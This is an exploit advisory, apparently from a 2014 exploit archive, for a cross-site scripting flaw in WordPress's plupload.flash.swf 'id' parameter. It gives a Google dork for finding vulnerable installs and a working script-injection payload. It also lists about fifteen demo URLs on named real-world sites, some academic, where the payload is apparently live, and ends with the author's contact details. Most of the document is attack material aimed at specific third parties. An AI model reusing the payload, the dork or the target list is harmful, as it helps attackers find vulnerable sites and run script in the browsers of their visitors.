[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
[+]
[+] Exploit Title: Wordpress Js plupload Cross Site Scripting
[+]
[+] Exploit Author: Ashiyane Digital Security Team
[+]
[+] Date: 2014-08-09
[+]
[+] Google Dork : inurl:/wp-includes/js/plupload
[+]
[+] Vendor Homepage : http://www.Wordpress.org
[+]
[+] Tested on: Linux , Mozilla FireFox
[+]
[+] Discovered By : M???? ??????? , Spoofer
[+]
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
[+] Location :
[localhost]/wp-includes/js/plupload/plupload.flash.swf?id=[XSS]
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
[+] Demo :
http://nexiran.ir/wp-includes/js/plupload/plupload.flash.swf?id=\%22%29%29;}catch%28e%29{alert%281%29;}//
http://wwwxad-qom.ir/wp-includes/js/plupload/plupload.flash.swf?id=\%22%29%29;}catch%28e%29{alert%281%29;}//
http://maxewest.com/wp-includes/js/plupload/plupload.flash.swf?id=\%22%29%29;}catch%28e%29{alert%281%29;}//
http://mexnter.thieme.com/log/wp-includes/js/plupload/plupload.flash.swf?id=\%22%29%29;}catch%28e%29{alert%281%29;}//
http://katyxdframe.com/wp/wp-includes/js/plupload/plupload.flash.swf?id=\%22%29%29;}catch%28e%29{alert%281%29;}//
http://www.stxrews.ac.uk/~cycling//wp-includes/js/plupload/plupload.flash.swf?id=\%22%29%29;}catch%28e%29{alert%281%29;}//
http://www.xc-vrsnik.com/EN/wp-includes/js/plupload/plupload.flash.swf?id=\%22%29%29;}catch%28e%29{alert%281%29;}//
http://kidsxunt.alaska.edu/wp-includes/js/plupload/plupload.flash.swf?id=\%22%29%29;}catch%28e%29{alert%281%29;}//
http://powxfworship.net/charity/wp-includes/js/plupload/plupload.flash.swf?id=\%22%29%29;}catch%28e%29{alert%281%29;}//
http://www.skxp.com//wp-includes/js/plupload/plupload.flash.swf?id=\%22%29%29;}catch%28e%29{alert%281%29;}//
http://www.coxxionfrance.com/movingtofrance/wp-includes/js/plupload/plupload.flash.swf?id=\%22%29%29;}catch%28e%29{alert%281%29;}//
http://jordaxrmstrongmusic.com/jam/wp-includes/js/plupload/plupload.flash.swf?id=\%22%29%29;}catch%28e%29{alert%281%29;}//
http://www.axn-central.com/stuffasianpeoplelike/wp-includes/js/plupload/plupload.flash.swf?id=\%22%29%29;}catch%28e%29{alert%281%29;}//
http://www.kaxhackett.com/wordpress/wp-includes/js/plupload/plupload.flash.swf?id=\%22%29%29;}catch%28e%29{alert%281%29;}//
http://fdowxoad52.com/wp-includes/js/plupload/plupload.flash.swf?id=\%22%29%29;}catch%28e%29{alert%281%29;}//
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
[+] Discovered By : M???? ??????? , Spoofer
We Love Mohammad , Spoofer ( Love )
Mail : milad.hacking.blackhat@gmail.com
Home Page : https://www.facebook.com/milad.hacking.5
WwW.Masaldownload.ir